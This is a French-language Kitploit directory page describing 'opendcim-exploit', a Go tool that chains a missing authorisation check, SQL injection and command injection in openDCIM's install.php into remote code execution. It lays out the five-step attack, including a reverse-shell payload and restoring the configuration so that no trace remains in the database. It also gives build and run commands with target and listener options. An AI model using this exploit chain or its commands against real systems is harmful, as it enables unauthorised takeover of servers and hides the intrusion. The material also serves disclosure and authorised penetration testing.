Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
opendcim-exploit — openDCIM install.php chaîne de SQLi vers RCE (CWE-862 + CWE-89 + CWE-78) | Kitploit
Outils/GitHubGitHub/chocapikk/opendcim-exploit
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubchocapikk/opendcim-exploit

opendcim-exploit

openDCIM install.php chaîne de SQLi vers RCE (CWE-862 + CWE-89 + CWE-78)

Voir le dépôt
52il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

openDCIM - SQLi vers RCE par empoisonnement de configuration

Chaîne d'exécution de code à distance ciblant le formulaire de configuration LDAP de install.php d'openDCIM. Construit sur le framework VulnCheck go-exploit.

Chaîne de vulnérabilités

#CVECWEDescription
1CVE-2026-28515CWE-862install.php n'effectue aucune vérification de rôle avant le formulaire de configuration LDAP - tout utilisateur peut y accéder
2CVE-2026-28516CWE-89Config::UpdateParameter() utilise l'interpolation de chaînes, requêtes empilées via PDO+MySQL
3CVE-2026-28517CWE-78report_network_map.php transmet la valeur de configuration dot directement à exec()

Versions concernées : Toutes les versions (testé sur le dernier commit 4467e9c4)

Fonctionnement

  1. POST vers install.php - l'injection SQL via le formulaire LDAP sauvegarde la configuration, remplace dot par une charge utile de commande
  2. GET report_network_map.php - déclenche exec(), confirme la RCE via la sortie de id
  3. POST vers install.php - remplace dot par une charge utile de shell inversé
  4. GET report_network_map.php - déclenche le shell inversé
  5. POST vers install.php - restaure toutes les valeurs de configuration d'origine depuis la table de sauvegarde

Aucune trace laissée dans la base de données après l'exploitation.

Compilation

root@kitploit:~
go build -o opendcim-exploit .

Utilisation

Déploiements Docker (non authentifiés)

root@kitploit:~
# Scan only
./opendcim-exploit -a -rhost 10.0.0.1 -rport 80

# Exploit with reverse shell
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer

Déploiements htpasswd (tout utilisateur valide)

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 80 -lhost 10.0.0.2 -lport 4444 -c2 SimpleShellServer -username user -password pass

SSL

root@kitploit:~
./opendcim-exploit -e -rhost 10.0.0.1 -rport 443 -ssl -lhost 10.0.0.2 -lport 4444 -c2 SSLShellServer

Options

OptionDéfautDescription
-rhostHôte cible
-rport80Port cible
-sslfalseUtiliser HTTPS
-lhostHôte d'écoute (pour le shell inversé)
-lportPort d'écoute (pour le shell inversé)
-c2Type de C2 : SimpleShellServer ou SSLShellServer
-usernameNom d'utilisateur HTTP Basic Auth (à omettre pour les déploiements SetEnv)
-passwordMot de passe HTTP Basic Auth (à omettre pour les déploiements SetEnv)
-aDétection d'actif (vérifie si la cible est exploitable)
-eMode exploitation
Télécharger l’outil